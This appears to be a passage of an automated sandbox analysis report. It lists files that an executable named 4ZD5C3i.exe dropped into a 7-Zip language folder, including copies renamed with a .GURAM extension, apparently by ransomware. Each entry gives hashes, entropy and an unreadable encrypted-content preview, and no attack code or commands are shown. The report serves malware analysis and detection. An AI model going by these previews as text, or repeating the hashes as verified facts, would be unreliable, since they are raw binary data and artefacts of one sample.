                                                                                                                                                                                                                                                Preview:t....kr..v.l.m....\.o..C.q.q..r.0V.n5b.&b.).W~J7f.....6....7w....-..7@X..>a.....|..9p...`,&..Kb9..R3MxX.X[pF....<..w}_Q....o}h.....n5..S-...).@0.bUA.l..?......`.)....=2;.d........Hgh7.E.N...`.s..Ca.K.@-q.Lg.7.t.J..I.P.n{.'..o..|X~..h..M_.m.M....,U.G.../.a[.^.;..=P...I)...}.+&..&....Y...58..s...U.D?...|...]....B.D......F^.v............/.,p8....H+.:G....0.....J..?&}..........2....z..I..,.^A.%.K....I%....i'.\.s.j!K....l%p.]'..{.yD2.......$..3........(.......w...KSbEo...q....k...D.'.q.,...eX...pSw0....S..l.t.........S.j.....&.'...8..g...{.;S...4..........dT*@Xv..`.fC}!......I..L=..a!W.n.....0.........7@.]uS-.$#9..5.B.iI.u..{W7...p.@.....s..!..)...*...t./.9F.k*>..D8j.yg..41.x.O)..(-kv.q..a...x......o...L.-..w...s.L.....l.k2K.@.."......3..G..z....m.....L.'.c....Z.}......P..L.].c...r..]....Gj.l4M......;...?BT...c.ql.o.=gh....P.B....A.../+..K.....:.@.VS..@..]..n.n....-g1......)....zs..(..}........r...*M.-t.....#."........I,.....}.a......./.I..S.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\co.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11560
                                                                                                                                                                                                                                                Entropy (8bit):7.9849142394179315
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:D3ynWem5IGsxvzOun0pNRMC8divwVDmzwXqOKtCOSsQYN1jbocb6qtQITfZfWUR:CWoGsBaGC8iwXqOXcfZm89R
                                                                                                                                                                                                                                                MD5:F08D32B1CBF3373BF56DB7EC56800A4C
                                                                                                                                                                                                                                                SHA1:F1A62F2893C8F0E59F2F5A59D6B61D2DC2F82838
                                                                                                                                                                                                                                                SHA-256:49E259B5DCF40424EAF1E3E6BCBE6561DECCF1D0178591DD3EAADBA72E4D052C
                                                                                                                                                                                                                                                SHA-512:4D25ACE6FE3AAC99BA36C5B16F88644791B173E25813CEA1AE98D243D86CA987B7AF1EE114F0E0C35E23ADDA6E5C0AB012CECA0FC1F86B66115B837AD5F1F41B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:t....kr..v.l.m....\.o..C.q.q..r.0V.n5b.&b.).W~J7f.....6....7w....-..7@X..>a.....|..9p...`,&..Kb9..R3MxX.X[pF....<..w}_Q....o}h.....n5..S-...).@0.bUA.l..?......`.)....=2;.d........Hgh7.E.N...`.s..Ca.K.@-q.Lg.7.t.J..I.P.n{.'..o..|X~..h..M_.m.M....,U.G.../.a[.^.;..=P...I)...}.+&..&....Y...58..s...U.D?...|...]....B.D......F^.v............/.,p8....H+.:G....0.....J..?&}..........2....z..I..,.^A.%.K....I%....i'.\.s.j!K....l%p.]'..{.yD2.......$..3........(.......w...KSbEo...q....k...D.'.q.,...eX...pSw0....S..l.t.........S.j.....&.'...8..g...{.;S...4..........dT*@Xv..`.fC}!......I..L=..a!W.n.....0.........7@.]uS-.$#9..5.B.iI.u..{W7...p.@.....s..!..)...*...t./.9F.k*>..D8j.yg..41.x.O)..(-kv.q..a...x......o...L.-..w...s.L.....l.k2K.@.."......3..G..z....m.....L.'.c....Z.}......P..L.].c...r..]....Gj.l4M......;...?BT...c.ql.o.=gh....P.B....A.../+..K.....:.@.VS..@..]..n.n....-g1......)....zs..(..}........r...*M.-t.....#."........I,.....}.a......./.I..S.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\cs.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:COM executable for DOS
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9758
                                                                                                                                                                                                                                                Entropy (8bit):7.978554485202215
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:8ikJXLgItAhw5vvW1ZE3kj7mV4uyCJYgWMwuhZJqV1UT:8tdgC5vvCE0jj8YgWxuhZgMT
                                                                                                                                                                                                                                                MD5:2EAB21508561B217B85709B9353C7852
                                                                                                                                                                                                                                                SHA1:27C147BF48470BDAE43CAE5472F44884D50D361A
                                                                                                                                                                                                                                                SHA-256:9C366868985F709A032067926C6F2AE937859512B61D4A41E842052185E46EB9
                                                                                                                                                                                                                                                SHA-512:59EE69830994AEDED5FB476FA0A36697576F2A90501AEB9190CFF26DCB82B92984211849AEE24D27916527C2B14D06AE852DBB00BBA763AA39145257F491E842
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..k...3..0.9? *.Z.`.1..b./k.ia$..+.^...)...Q42w ...%....f..+.WcL5..S@.|..2.y..r.....E...r.=q....n5....4.U>.R%5n...0..oY6..b*.~.N.a.^~,.Ku.'Y|.Q..V..2...)v.....\....,.)..C.@...#..Q.Y&[Z1oQ./>..kl.*.Nq..tZ..J.!)..)...o.5..g..ThD.Q......#.S.'M+0.O...mRA".<...e2...G.U..5..]..yb2A.v..Yv....9?..~..5!?')N.q.-.pd.r%.@..{w}z.U......!..-...}Q*lT1iv.r..Z.j....=.r.F.......z..g.*..}.S.O......#.g`..E..'n..f.Jz.w.....~..]...^O%.Y....G.9..@.< CZ..]".....#..)....D..Q......(.+.}..Q{ ....x.=f.=.....iDM..).M.,.Q.+.3.F..%K.>.#......0..L#.$..j...<zI.....H.%.|...b.....DO......^..Q..N<..<...[..:c.@..1I...9P72?.....e]..x....c...i.C.......:.5.?.._,P.Xhd].R..v..........:...E5*.s...AI.. .8a.r.*..Cx.QG.`3..p...s.wt..B.o.N.."S..,(...pT...)s..f.V.J_.Rb#.=..J'...8...)....0.....*....gh....-.S..Y;N....-Ko....-,..j^.,.2..w.....}..k..Fd$9//.UC.%z....f.16".P..<P5....'f.[}....._]..D.RN:....I...n....g.z..........i..*&...........0vXg..I.&......P.T>..&.}6?.(''.%.s.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\cs.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:COM executable for DOS
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9758
                                                                                                                                                                                                                                                Entropy (8bit):7.978554485202215
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:8ikJXLgItAhw5vvW1ZE3kj7mV4uyCJYgWMwuhZJqV1UT:8tdgC5vvCE0jj8YgWxuhZgMT
                                                                                                                                                                                                                                                MD5:2EAB21508561B217B85709B9353C7852
                                                                                                                                                                                                                                                SHA1:27C147BF48470BDAE43CAE5472F44884D50D361A
                                                                                                                                                                                                                                                SHA-256:9C366868985F709A032067926C6F2AE937859512B61D4A41E842052185E46EB9
                                                                                                                                                                                                                                                SHA-512:59EE69830994AEDED5FB476FA0A36697576F2A90501AEB9190CFF26DCB82B92984211849AEE24D27916527C2B14D06AE852DBB00BBA763AA39145257F491E842
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..k...3..0.9? *.Z.`.1..b./k.ia$..+.^...)...Q42w ...%....f..+.WcL5..S@.|..2.y..r.....E...r.=q....n5....4.U>.R%5n...0..oY6..b*.~.N.a.^~,.Ku.'Y|.Q..V..2...)v.....\....,.)..C.@...#..Q.Y&[Z1oQ./>..kl.*.Nq..tZ..J.!)..)...o.5..g..ThD.Q......#.S.'M+0.O...mRA".<...e2...G.U..5..]..yb2A.v..Yv....9?..~..5!?')N.q.-.pd.r%.@..{w}z.U......!..-...}Q*lT1iv.r..Z.j....=.r.F.......z..g.*..}.S.O......#.g`..E..'n..f.Jz.w.....~..]...^O%.Y....G.9..@.< CZ..]".....#..)....D..Q......(.+.}..Q{ ....x.=f.=.....iDM..).M.,.Q.+.3.F..%K.>.#......0..L#.$..j...<zI.....H.%.|...b.....DO......^..Q..N<..<...[..:c.@..1I...9P72?.....e]..x....c...i.C.......:.5.?.._,P.Xhd].R..v..........:...E5*.s...AI.. .8a.r.*..Cx.QG.`3..p...s.wt..B.o.N.."S..,(...pT...)s..f.V.J_.Rb#.=..J'...8...)....0.....*....gh....-.S..Y;N....-Ko....-,..j^.,.2..w.....}..k..Fd$9//.UC.%z....f.16".P..<P5....'f.[}....._]..D.RN:....I...n....g.z..........i..*&...........0vXg..I.&......P.T>..&.}6?.(''.%.s.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\cy.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5824
                                                                                                                                                                                                                                                Entropy (8bit):7.963810365157502
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:PorfEGDoZMC0rX5rLqu+UTzi9ayMPD9VH7ugKBleb:E8GD0Y5reiTaayiXigKBUb
                                                                                                                                                                                                                                                MD5:42B127BEDB788E8E9044542AF9F48864
                                                                                                                                                                                                                                                SHA1:EC0031675D095B7F46EA4871D300004E5D23E570
                                                                                                                                                                                                                                                SHA-256:C21A3A4950DB55C3D179A6B296F6A5CC3D4614F95F5A6212096155E54EED6FFB
                                                                                                                                                                                                                                                SHA-512:8A5E5AC04C899914BB9BF490F9CF859DA33CAF57AA0FECE29B85D5E01BD74F2EF1A826E8FDF63C7018B7D504D3CCE55259F76DA693A7721C2B2E6252BBA0458A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:zO.<n....]y#\...2..<V....%....[C..k..T..jtH..A.. ...b=.90Al....]..=.uQ..2B...r..wm:yI.-.._.$..o)y.m.Z\U...R..}$....-t....X......YG.$.[..........h{-....L....r...:._t...0.;X..Ud..LTB/<....9g.....W....v..n...~H.......1-.y.l4{2.U.Ah.._...E..2.5v....Tc8.h2t~..$.*..y..{..V+.]*..k..}*..:.qs..n.<[s..:..+...}3..D...R..j9.b.. _....w9.Z.Y.U.cvL.&.U.c(...n}.>.E..'w..........Q..........:.......<.-R....0..4...4.+s..b...{...p.E.nv.....rk>q.%.x)..yr........... Qf...STy.. ..4.r...../..V.+DcB....VD..."....Z..Qv.R;%6.U......36..1......1......]1.....h*.7.....zpZc.s...r.........=....1.6..?..Q.G.....).\.>yN.E.4I<.s.iCx..c...b.Rc..c...W`...K......=F..)P......^.n} .-.a~+UO......u{.T.....[........=.w.e...=..y9.p..4.[,.fI.....3..J(*......{..w.....v......M.i.\.........-......'...O.c..[..nJ..$.>.b..........4D.V..p._...N......................f.l..n.........c~..q..\.....^...<..x&Y...t...K.;..:.....W....=.P.."..\*....(.Dmh.g....;.v.'[.......t<T...%q.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\cy.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5824
                                                                                                                                                                                                                                                Entropy (8bit):7.963810365157502
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:PorfEGDoZMC0rX5rLqu+UTzi9ayMPD9VH7ugKBleb:E8GD0Y5reiTaayiXigKBUb
                                                                                                                                                                                                                                                MD5:42B127BEDB788E8E9044542AF9F48864
                                                                                                                                                                                                                                                SHA1:EC0031675D095B7F46EA4871D300004E5D23E570
                                                                                                                                                                                                                                                SHA-256:C21A3A4950DB55C3D179A6B296F6A5CC3D4614F95F5A6212096155E54EED6FFB
                                                                                                                                                                                                                                                SHA-512:8A5E5AC04C899914BB9BF490F9CF859DA33CAF57AA0FECE29B85D5E01BD74F2EF1A826E8FDF63C7018B7D504D3CCE55259F76DA693A7721C2B2E6252BBA0458A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:zO.<n....]y#\...2..<V....%....[C..k..T..jtH..A.. ...b=.90Al....]..=.uQ..2B...r..wm:yI.-.._.$..o)y.m.Z\U...R..}$....-t....X......YG.$.[..........h{-....L....r...:._t...0.;X..Ud..LTB/<....9g.....W....v..n...~H.......1-.y.l4{2.U.Ah.._...E..2.5v....Tc8.h2t~..$.*..y..{..V+.]*..k..}*..:.qs..n.<[s..:..+...}3..D...R..j9.b.. _....w9.Z.Y.U.cvL.&.U.c(...n}.>.E..'w..........Q..........:.......<.-R....0..4...4.+s..b...{...p.E.nv.....rk>q.%.x)..yr........... Qf...STy.. ..4.r...../..V.+DcB....VD..."....Z..Qv.R;%6.U......36..1......1......]1.....h*.7.....zpZc.s...r.........=....1.6..?..Q.G.....).\.>yN.E.4I<.s.iCx..c...b.Rc..c...W`...K......=F..)P......^.n} .-.a~+UO......u{.T.....[........=.w.e...=..y9.p..4.[,.fI.....3..J(*......{..w.....v......M.i.\.........-......'...O.c..[..nJ..$.>.b..........4D.V..p._...N......................f.l..n.........c~..q..\.....^...<..x&Y...t...K.;..:.....W....=.P.."..\*....(.Dmh.g....;.v.'[.......t<T...%q.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\da.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8973
                                                                                                                                                                                                                                                Entropy (8bit):7.978455140081945
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:juuW16t3Nuarx6Q2YucRpSLUXxzzKug6xS6NFnzoZCUj:ivQNuaYQXRCUBzuunxS6NFnz85j
                                                                                                                                                                                                                                                MD5:577028B4FBC221310BFCB8B8F02EB065
                                                                                                                                                                                                                                                SHA1:AC2BE0FAF6DD43E39BC4E21C31686BD09C135CB8
                                                                                                                                                                                                                                                SHA-256:DB7FDC6DE9AF6BE669084D11A01BFA8D3E61437DA4D390292F44C1C2B66E508F
                                                                                                                                                                                                                                                SHA-512:55457B5B7E073DE16948D17260EDE01FEB3E78D505488176207A42B7CF33C233228A1CD75BCEAC66D7A04A79785B8D15C8840431F75E95D2D94FCC748C12F945
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview::.......K.......zd0..K....-l.\...O*..9..w@2..o...V.\2...|q....*KWG..?..hd....J.(/KN...V..^..!..E...H`..~...%......fM_.[1.U...=...W.. #o.....K.T....I.1........L.wc...P[....=&...b...Q).o...Td..{....[....:e....)..}EJ.a..n..g9._ho..../<.?r..9,.Q..e.:....N..z6.[..+Q R...d....k....j].b.mp.3..=o..3...L..>....J}~..=M.TH-.Z.Z>i.....y_.......n. .....R/.... -4......).8.#...[.7@.NB&O.....V..#...c........[M.&.C....G.D...)Lw*3..}._{.!.a.=.BPE...[.a.$opRy*..:.\..Z..n*.N.N.o.N.\SB..0;).._.{..*....S\..5...+.n...lB.%.^'d..........U5,.....>........o......F.u..D.....W;...@\.....FJ.e.......*....S.`..%...w..&!...L.....o5.n...v..[...r................Xj..`.^.B,p....b.....&..3...RE3...Tp.......m...6....Ln....x..`e.........m....u.!...y.&.OIZpU...$.gU..#.Y....[=..H.]..m.F..bS..,..1t..X..g%.c2........S......C.XG.X.....P.Y.Q.A.F .:`...A.J......v.\%..QuO.X.........Am........6.J.K0..^.->K.X....D.!....P...B].......Lm..L.j....{`.W..4]B..".4...Iu..r)X7.......

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\da.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8973
                                                                                                                                                                                                                                                Entropy (8bit):7.978455140081945
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:juuW16t3Nuarx6Q2YucRpSLUXxzzKug6xS6NFnzoZCUj:ivQNuaYQXRCUBzuunxS6NFnz85j
                                                                                                                                                                                                                                                MD5:577028B4FBC221310BFCB8B8F02EB065
                                                                                                                                                                                                                                                SHA1:AC2BE0FAF6DD43E39BC4E21C31686BD09C135CB8
                                                                                                                                                                                                                                                SHA-256:DB7FDC6DE9AF6BE669084D11A01BFA8D3E61437DA4D390292F44C1C2B66E508F
                                                                                                                                                                                                                                                SHA-512:55457B5B7E073DE16948D17260EDE01FEB3E78D505488176207A42B7CF33C233228A1CD75BCEAC66D7A04A79785B8D15C8840431F75E95D2D94FCC748C12F945
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview::.......K.......zd0..K....-l.\...O*..9..w@2..o...V.\2...|q....*KWG..?..hd....J.(/KN...V..^..!..E...H`..~...%......fM_.[1.U...=...W.. #o.....K.T....I.1........L.wc...P[....=&...b...Q).o...Td..{....[....:e....)..}EJ.a..n..g9._ho..../<.?r..9,.Q..e.:....N..z6.[..+Q R...d....k....j].b.mp.3..=o..3...L..>....J}~..=M.TH-.Z.Z>i.....y_.......n. .....R/.... -4......).8.#...[.7@.NB&O.....V..#...c........[M.&.C....G.D...)Lw*3..}._{.!.a.=.BPE...[.a.$opRy*..:.\..Z..n*.N.N.o.N.\SB..0;).._.{..*....S\..5...+.n...lB.%.^'d..........U5,.....>........o......F.u..D.....W;...@\.....FJ.e.......*....S.`..%...w..&!...L.....o5.n...v..[...r................Xj..`.^.B,p....b.....&..3...RE3...Tp.......m...6....Ln....x..`e.........m....u.!...y.&.OIZpU...$.gU..#.Y....[=..H.]..m.F..bS..,..1t..X..g%.c2........S......C.XG.X.....P.Y.Q.A.F .:`...A.J......v.\%..QuO.X.........Am........6.J.K0..^.->K.X....D.!....P...B].......Lm..L.j....{`.W..4]B..".4...Iu..r)X7.......

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\de.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10175
                                                                                                                                                                                                                                                Entropy (8bit):7.980482876863539
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:gZvEBb7LDFQxzVvYzfF6CW3SHYH3aJ6NGzCZ7K/avmWPKpESXK6iUnH:gZUrDFQHw7F8QU6z/aOWSpESX3nH
                                                                                                                                                                                                                                                MD5:075695EC3B341B530DBE94E7A0FD6185
                                                                                                                                                                                                                                                SHA1:AADA88DA190711122502CF9EB3EE29CEB8B4256E
                                                                                                                                                                                                                                                SHA-256:62B0E50A212C7E4D307369F807E4982C5BC69A694F7417556F750FC125796ED1
                                                                                                                                                                                                                                                SHA-512:D727BC02C228C4B80ACC63CE06E5A7A77FD5D2B2B81415BB98F391F7E0BD7ABC1F2CAACCE71EC65AD10A8BF68C96818C8182A0E7BC307139A62BA7FA449AB92F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.@.......n.).VZ.K{6..."......|..r.b;KZJ@&......?#E.f...k6+{.g..k.S&c.....H..O..3..Y.8......I..<>...s.H.Ai.O...r.._\....h|^`.W..FgN.v...A...wo,.6....[h<.E....e.-.I.6..q...5.,.U.#._.q....U7R..<C.Q.......?...>.....^YbY-5.b.pr[.Q@M.......+Q......~Nf0....}..........LB(.&`qZfMe...}.....9Iq8`...._L.q.8..7.....L..".A...k...7z..8.......Z..-.x.U#.u..4.G...,.)n.....f.o.5n<.&.76.i.......j{Y..L...|..-.8$xe.7.....+m*N...t?..R.Z...... .>Ur.z..]..!.~....ta.=..i.u..).....R.5}p.|6.....b..F\..@.s....*...a...z.p..l4.....kG...3B[AZ..D.........T.e...j5'd.7.......3?|..g.?_}B...+.X.#.U.[I....&.?.wA&..hk........b.Y..._..k!..].........w...!....p.G...:)~s.#...m)...6i@...Gyr..\.G^f...@..Y)/....R...#4u.!A|&3...1?..C8A)v.%...K.g...-`%..o.o..r..rL..(5 ...Q=..s......X..RI|G.3.2oT....N_.i^.].9?4..^Q.iw....B(Q..._...Qa.x.*.6..SCvv...@....l..OV.8..[.'*k.pZ.M..<c.E..yrM&9...}{!..[.t..C.".).......4.p1.x.5..f.vV..#..q....*....3.C+\L.1Z.......J.G'...I...P.@b(1.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\de.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10175
                                                                                                                                                                                                                                                Entropy (8bit):7.980482876863539
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:gZvEBb7LDFQxzVvYzfF6CW3SHYH3aJ6NGzCZ7K/avmWPKpESXK6iUnH:gZUrDFQHw7F8QU6z/aOWSpESX3nH
                                                                                                                                                                                                                                                MD5:075695EC3B341B530DBE94E7A0FD6185
                                                                                                                                                                                                                                                SHA1:AADA88DA190711122502CF9EB3EE29CEB8B4256E
                                                                                                                                                                                                                                                SHA-256:62B0E50A212C7E4D307369F807E4982C5BC69A694F7417556F750FC125796ED1
                                                                                                                                                                                                                                                SHA-512:D727BC02C228C4B80ACC63CE06E5A7A77FD5D2B2B81415BB98F391F7E0BD7ABC1F2CAACCE71EC65AD10A8BF68C96818C8182A0E7BC307139A62BA7FA449AB92F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.@.......n.).VZ.K{6..."......|..r.b;KZJ@&......?#E.f...k6+{.g..k.S&c.....H..O..3..Y.8......I..<>...s.H.Ai.O...r.._\....h|^`.W..FgN.v...A...wo,.6....[h<.E....e.-.I.6..q...5.,.U.#._.q....U7R..<C.Q.......?...>.....^YbY-5.b.pr[.Q@M.......+Q......~Nf0....}..........LB(.&`qZfMe...}.....9Iq8`...._L.q.8..7.....L..".A...k...7z..8.......Z..-.x.U#.u..4.G...,.)n.....f.o.5n<.&.76.i.......j{Y..L...|..-.8$xe.7.....+m*N...t?..R.Z...... .>Ur.z..]..!.~....ta.=..i.u..).....R.5}p.|6.....b..F\..@.s....*...a...z.p..l4.....kG...3B[AZ..D.........T.e...j5'd.7.......3?|..g.?_}B...+.X.#.U.[I....&.?.wA&..hk........b.Y..._..k!..].........w...!....p.G...:)~s.#...m)...6i@...Gyr..\.G^f...@..Y)/....R...#4u.!A|&3...1?..C8A)v.%...K.g...-`%..o.o..r..rL..(5 ...Q=..s......X..RI|G.3.2oT....N_.i^.].9?4..^Q.iw....B(Q..._...Qa.x.*.6..SCvv...@....l..OV.8..[.'*k.pZ.M..<c.E..yrM&9...}{!..[.t..C.".).......4.p1.x.5..f.vV..#..q....*....3.C+\L.1Z.......J.G'...I...P.@b(1.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\el.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17505
                                                                                                                                                                                                                                                Entropy (8bit):7.987473461379197
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:eoS7C8jhgQ+hiC/XYIKNfjvabexL0HO0dM:V4CsNNC/XiNfjvabjM
                                                                                                                                                                                                                                                MD5:E8C0DC55429BA1E55A1FD944324275A9
                                                                                                                                                                                                                                                SHA1:50B05EB40246CF1BFCC49E429B19397ABEE1E7B4
                                                                                                                                                                                                                                                SHA-256:B23D87F00EF54A92BE0C99C098D2AD6A31B44866602DCD6AB017EA604A1AC48E
                                                                                                                                                                                                                                                SHA-512:975D94A1E4DE604DF6004BC7D7D828E0945607088FD74579E1AA4BE467A9C0551023B4942FED2FB30A6010F7A6E7631F017C913A20DF459F138EB8F4DBB804FB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:n...v.X.?0.=.F!>..1....O}....8".\.Mg..sa.w>0.C....w.i..b.L..F~>.`.........F5J..X....xP....V.6.[H..hQ.Y.|.b.@.b.\.|...R_.l3}P....R..3I....!.2VGh.t..w..U.)>| B.CE...........r.)">..N^;2.....|\..rO.FF.w?.u0U..>$C.O..i.=.3..H...C.yc.R~.3aUA.I-V..=.....u\.a........n.*4u.'..ti...3F|.L..F...)H..O..GN.0e..a.!...H8..U..(n.14....I8.......G.....1X...J4+..Y.nQ6....XV...].#oBrba].au...*....Sn[.!...B...].}Y.g.ut..n^.....@..:.R.d-....6......K/..ar..-.....E..a......K.f.l...r....D.e..Q_@@5.n9B...BJ._.H..vK(.c.Ln..y..\.R..1.K.6@i3.r`...T.O...Q..W6d2..R...(..lyS../?&......4B..dK..e..K+"..#M..G5.V..T...I.CG.@..y~KtE...(.+....w.Vm..Y!...P..`.......!... S I..j...._K...!.(+b.......OX...Y..1o.I.0...2..xSL.bx.6.^......I..x....zs0.....IH}_cy.a.....y..BJ......g|.._....O.K.........x:[2HJ..?.2|..j.06#..\.....R0.-;...>.u..m..Q.o.....[...B.h....X....Vic..S..G...B......k.i.).h.eK.....$XP.A..M....( (.tQ..a.mI...4.j.....ck.....Y.o>2.X.....Z...._.. ..M5...^...H.s......2...TT.HY

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\el.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17505
                                                                                                                                                                                                                                                Entropy (8bit):7.987473461379197
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:eoS7C8jhgQ+hiC/XYIKNfjvabexL0HO0dM:V4CsNNC/XiNfjvabjM
                                                                                                                                                                                                                                                MD5:E8C0DC55429BA1E55A1FD944324275A9
                                                                                                                                                                                                                                                SHA1:50B05EB40246CF1BFCC49E429B19397ABEE1E7B4
                                                                                                                                                                                                                                                SHA-256:B23D87F00EF54A92BE0C99C098D2AD6A31B44866602DCD6AB017EA604A1AC48E
                                                                                                                                                                                                                                                SHA-512:975D94A1E4DE604DF6004BC7D7D828E0945607088FD74579E1AA4BE467A9C0551023B4942FED2FB30A6010F7A6E7631F017C913A20DF459F138EB8F4DBB804FB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
